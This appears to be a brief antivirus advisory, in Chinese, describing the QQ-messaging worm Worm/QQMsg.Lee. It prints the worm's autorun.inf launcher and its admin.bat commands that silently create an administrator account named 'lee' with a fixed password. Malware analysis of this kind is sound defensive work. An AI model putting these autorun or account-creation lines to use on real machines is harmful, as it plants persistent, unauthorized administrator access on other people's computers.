Worm/QQMsg.Lee
病毒类型:蠕虫
病毒大小:204859,204865字节
传播方式:网络
编译版本:VCdebug
QQ消息病毒Worm/QQMsg.Lee与以往的病毒类似,只是发送广告信息。病毒自动运行方式不同于传统修改注册表启动项,而是创建了autorun.inf自运行文件,打开盘符后会自动运行,原理与自启动光盘相同。
具体技术特征如下:
1. 病毒运行后在各个盘的根目录下创建隐含文件:
system32.exe, 204859字节
system32dll.dll, 204865字节
admin.bat, 71字节
autorun.inf, 28字节
其中autorun.inf的内容为:
[autorun]
open=System32.exe
使得每当打开盘符后病毒自动运行。病毒的这种方法区别于一般的修改注册表启动项的方法,更加隐蔽。
2.病毒运行后会监视qq聊天窗口,一旦发现则向对方发送病毒网址
3. 病毒运行后产生的admin.bat内容为:
net user lee abcd1234!@# /add
net localgroup administrators lee /add
病毒将增加一个名为lee的用户,密码为abcd1234!@#,然后将之加入管理员组。
注:%Windir%为变量,一般为C:Windows 或 C:Winnt;
%System%为变量,一般为C:WindowsSystem (Windows 95/98/Me),
C:WinntSystem32 (Windows NT/2000),
或 C:WindowsSystem32 (Windows XP)。
